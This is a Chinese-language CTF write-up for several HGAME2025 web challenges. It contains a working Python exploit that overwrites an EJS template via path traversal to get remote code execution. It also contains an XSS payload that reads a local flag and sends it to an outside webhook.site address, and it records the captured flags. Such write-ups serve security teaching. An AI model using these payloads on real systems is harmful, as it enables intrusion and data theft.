HGAME2025 部分WP

Web

Level 24 Pacman

image-20250217005319344

image-20250217005543895

null

栅栏分为2栏

hgame{u_4re_pacman_m4ster}

Level 47 BandBomb

用了ejs模板,可以直接覆盖重新ejs文件RCE。

import requests

def upload_evil_template(url):
    # 构造恶意ejs模板
    evil_template = '''
    <%- global.process.mainModule.require('child_process').execSync('env') %>
    '''
    
    files = {
        'file': ('evil.txt', evil_template)
    }
    r = requests.post(f"{url}/upload", files=files)
    return r.json()['filename']

def move_template(url, filename):
    data = {
        'oldName': filename,
        'newName': '../../app/views/mortis.ejs'
    }
    return requests.post(f"{url}/rename", json=data)

def trigger_rce(url):
    return requests.get(f"{url}/")

def main():
    url = "http://node1.hgame.vidar.club:32025"
    
    print("[+] 上传恶意模板...")
    filename = upload_evil_template(url)
    
    print("[+] 移动模板文件...")
    move_template(url, filename)
    
    print("[+] 触发模板渲染...")
    r = trigger_rce(url)
    print(r.text)

if __name__ == "__main__":
    main()


# FLAG=hgame{@ve-mUJ1cA-HAs-BrokEn_up_BUt_wE_H@VE_UMIT4ki3c}

Level 69 MysteryMessageBoard

首先是密码爆破

null

这里利用的是xss,附上脚本

<script>
fetch('http://127.0.0.1:8888/flag')
  .then(response => response.text())
  .then(data => {
    fetch('https://webhook.site/c149920f-141c-4d08-af14-1a6a58cbe3a9', {
      method: 'POST',
      body: data
    });
  });
</script>

null


网站的管理员,似乎是个萌新🤔,CTBUer